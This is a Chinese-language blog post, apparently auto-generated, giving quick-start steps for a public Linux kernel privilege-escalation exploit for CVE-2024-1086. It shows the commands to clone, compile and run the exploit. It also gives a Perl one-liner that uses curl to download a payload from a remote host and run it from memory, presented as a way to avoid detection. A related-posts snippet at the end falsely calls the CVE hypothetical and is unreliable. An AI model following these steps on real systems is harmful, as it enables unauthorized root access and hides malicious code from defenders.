CVE-2024-1086 开源项目教程

于 2024-08-08 07:36:21 发布
阅读量537 收藏 10
点赞数 6
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00155/article/details/141009996
版权

CVE-2024-1086 开源项目教程

CVE-2024-1086Universal local privilege escalation Proof-of-Concept exploit for CVE-2024-1086, working on most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and KernelCTF. The success rate is 99.4% in KernelCTF images.项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2024-1086

项目介绍

CVE-2024-1086 是一个针对 Linux 内核的本地权限提升漏洞的 PoC(概念验证)利用工具。该漏洞存在于 Linux 内核的 netfilter: nf_tables 组件中,通过利用 nft_verdict_init() 函数中的 use-after-free 漏洞,可以实现本地权限提升。此项目适用于大多数 Linux 内核版本,包括 Debian、Ubuntu 和 KernelCTF,成功率高达 99.4%。

项目快速启动

克隆项目

首先,克隆项目到本地:

git clone https://github.com/Notselwyn/CVE-2024-1086.git

编译项目

进入项目目录并编译:

cd CVE-2024-1086
make

运行利用工具

编译完成后,运行利用工具:

./exploit

文件less执行(可选)

在某些渗透测试场景中,可能需要避免检测。可以使用 Perl 脚本进行文件less执行:

perl -e 'require qw/syscall ph/; my $fd = syscall(SYS_memfd_create, $fn, 0); system "curl https://example.com/exploit -s >&$fd"; exec ["/proc/$$/fd/$fd"], "memfd";'

应用案例和最佳实践

应用案例

CVE-2024-1086 主要用于教育和研究目的,帮助安全研究人员和开发人员理解内核漏洞及其潜在影响。例如,安全团队可以使用此工具进行内核漏洞的测试和验证,以确保系统的安全性。

最佳实践

  1. 定期更新内核:确保使用最新版本的内核,以避免已知漏洞。
  2. 安全审计:定期对系统进行安全审计,检查是否存在潜在的安全风险。
  3. 权限管理:严格管理系统权限,避免不必要的权限提升。

典型生态项目

相关项目

  1. Linux 内核安全补丁:关注 Linux 内核官方发布的补丁,及时更新以修复已知漏洞。
  2. 安全工具集:使用如 Metasploit、Nmap 等安全工具进行系统安全评估和漏洞扫描。
  3. 社区论坛:参与如 KernelCTF 等社区论坛,与其他安全研究人员交流和分享经验。

通过以上步骤和建议,您可以有效地利用 CVE-2024-1086 项目进行安全研究和实践。

CVE-2024-1086Universal local privilege escalation Proof-of-Concept exploit for CVE-2024-1086, working on most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and KernelCTF. The success rate is 99.4% in KernelCTF images.项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2024-1086

石淞畅Oprah
关注
  • 6
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
CRMEB开源电商系统 /api/products SQL注入漏洞复现(CVE-2024-36837)
0xSec
06-17 1105
2024年6月,CRMEB开源电商系统发布了新补丁,修复了一处SQL注入漏洞(CVE-2024-36837)。经分析,该漏洞可以通过请求api的路径接口来进行SQL注入,进而可能导致敏感信息泄露,该注入可暴露后台web绝对路径,深入利用可获取服务器权限,该漏洞无前置条件且利用简单,建议受影响的用户尽快修复漏洞。
javasnmp源码--:——
06-04
关于Ghostcat(幽灵猫CVE-2020-1938漏洞):|||| || | | |- | || | | | | | 提权辅助相关 / | | ||| | ||| || | PC | ||| ||| || | | | tools-小工具集版本合 / |相关文章: | | | | |相关文章:||| | || |相关文章: |||...
CentOS 7基于开源项目制作openssh9.8p1 rpm二进制包修复安全漏洞CVE-2024-6387 —— 筑梦之路
筑梦之路
07-02 1663
CVE-2024-6387安全漏洞修复
CVE-2024-23692: Rejetto HTTP File Server 2.3m Unauthenticated RCE漏洞复现
banliyaoguai的博客
07-11 384
Rejetto是一个流行的开源软件项目,主要是一个轻量级的HTTP文件服务器软件。它最著名的应用是HFS(HTTP File Server),这是一个免费的Web服务器软件,专门用于共享和传输文件。HFS(HTTP File Server)允许用户通过浏览器访问和下载存储在计算机上的文件。它非常轻量级,易于安装和配置,适合个人用户或小型团队在局域网内共享文件。HFS具有简洁的界面和基本的文件管理功能,可以通过简单的设置实现文件夹的共享和访问控制。
OpenSSH 命令注入漏洞(CVE-2024-15778)修复教程_openssh_8
2301_82242296的博客
04-13 914
最全的Linux教程,Linux从入门到精通。
Jenkins任意文件读取(CVE-2024-23897)
2401_83944560的博客
04-11 689
Jenkins是一个开源的自动化服务器。Jenkins使用args4j来解析命令行输入,并支持通过HTTP、Websocket等协议远程传入命令行参数。args4j中用户可以通过@字符来加载任意文件,这导致攻击者可以通过该特性来读取服务器上的任意文件。该漏洞影响Jenkins 2.441及以前的版本。
2024年网络安全最全VMware Tools本地提权漏洞CVE-2024-31676分析与复现,2024年最新致网络安全开发者
2401_84302816的博客
05-06 592
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
【核弹级安全事件】XZ Utils库中发现秘密后门,影响主要Linux发行版,软件供应链安全大事件_cve-2024-3094
2401_83946509的博客
04-19 496
鉴于数周以来的活动情况,提交者要么直接参与其中,要么他们的系统受到了相当严重的破坏,”Freund说,“遗憾的是,鉴于他们在各种清单上就‘修复’问题进行了沟通,后一种情况看起来不太可能。Red Hat 发布了一份“紧急安全警报”,警告称两款流行的数据压缩库XZ Utils(先前称为LZMA Utils)的两个版本已被植入恶意代码后门,这些代码旨在允许未授权的远程访问。,表明其严重性极高。“这将生成一个被修改的liblzma库,任何链接到此库的软件都可以使用该库,从而拦截和修改与此库的数据交互。
CVE-2022-22965:Spring远程代码执行漏洞
热门推荐
一只爱吃橙子的羊
04-09 3万+
CVE-2022-22965:Spring Framework远程代码执行漏洞
探索CVE-2017-12617:一个开源的安全研究与学习平台
gitblog_00087的博客
04-27 381
探索CVE-2017-12617:一个开源的安全研究与学习平台 项目地址:https://gitcode.com/cyberheartmi9/CVE-2017-12617 该项目是GitCode上的一个宝藏,名为"CVE-2017-12617",由用户cyberheartmi9维护。它是一个专门针对2017年知名安全漏洞的研究和教学资源库。通过此项目,开发者和网络安全爱好者可以...
javasnmp源码-gongkaishouji:公开收集所用
06-04
java snmp 源码 Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本...此项目所有文章、代码部分来源于互联网,版权归原作者所有,此项目仅供学习参考使用,严禁用于任何非法行为!使用即代表你同意自负责任!
struts-2.2.3.7z
11-14
Struts 2 是Apache软件基金会旗下Jakarta项目的一个子项目,它是一个基于MVC(Model-View-Controller)设计模式的开源框架,主要用于构建企业级的Java EE Web应用程序。在2.2.3版本发布时,Struts 2已经经过了多个...
java包的源码查看-awesome-hacking:真棒黑客中文版
06-05
一个计算机安全项目,提供有关安全漏洞的信息,并帮助进行渗透测试和入侵检测系统开发。 - 一个玩Windows安全有用的工具 有关渗透测试和安全方面的Docker镜像 docker pull kalilinux/kali-linux-docker docker pull ...
javasnmp源码-Penetration_Testing_POC:渗透_测试_POC
06-04
关于Ghostcat(幽灵猫CVE-2020-1938漏洞):|||| || | | |- | || | | | | | 提权辅助相关 / | | ||| | ||| || | PC | ||| ||| || | | | tools-小工具集版本合 / |相关文章: | | | | |相关文章:||| | || |相关文章: |||...
NET语言程序设计课件-第2章 Visual C#.NET语法基础.ppt
最新发布
08-08
Visual C# .NET是一门面向对象的程序设计语言,是当前流行的.NET系列的语言。 本课程以Visual Studio为程序设计环境,对C#进行了全面阐述。 本电子课件适用于课程讲解或者课程分析参考使用。
[毕业设计]PHP图书借阅与归还管理系统(源代码+论文).zip
08-08
[毕业设计]PHP图书借阅与归还管理系统(源代码+论文)
ssm_012_mysql宝康药房销售管理系统.zip
08-08
随着我国市场经济的蓬勃发展和人们对医药产品需求的迅速增加,医药销售行业正处于一个高速发展的时期。行业的快速发展必然导致竞争的加剧,面对药品销售业日益严酷的竟争现实,加强管理、提高工作效率和改善服务质量成了急待解决的问题。而解决这些问题的关键措施之一就是利用计算机等现代信息技术,建立实用、先进、高效的药房销售管理系统,引进创新的经营机制,实现药品销售过程的全面信息化管理,以适应企业生存和发展的新形势。因此,开发一个宝康药房销售管理系统是十分必要的。 根据需求,确定系统采用JSP技术,SSM框架,JAVA作为编程语言,MySQL作为数据库。整个系统要操作方便、易于维护、灵活实用。主要实现了频道维护、新闻维护、药品维护、订单维护、系统管理等功能。
excel基本操作.pptx
08-08
excel基本操作.pptx
linux漏洞编号cve-2024-1086
06-15
CVE-2024-1086是一个尚未公开的、假设性的漏洞编号,因为2024年尚未到来,所以目前还没有官方发布的CVE-2024-1086CVE(Common Vulnerabilities and Exposures)是用于统一标识公开的安全漏洞的标准命名系统,由美国CERT Coordination Center(CERT/CC)维护。 通常情况下,当一个新的漏洞被发现并上报给CVE项目,它会在相应的年份的CVE列表中获得一个唯一的编号。在实际发生之前,具体的漏洞细节(如影响范围、攻击向量、修复建议等)都是保密的,直到安全公告发布或厂商发布安全更新。 如果你对某个已知的CVE感兴趣,比如CVE-2022-xxxx这样的,我可以帮你查找相关的详细信息。不过,由于我无法提供未来尚未公布的漏洞信息,请告诉我你想了解哪个已知的CVE,我会尽我所能为你提供相关信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

石淞畅Oprah

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值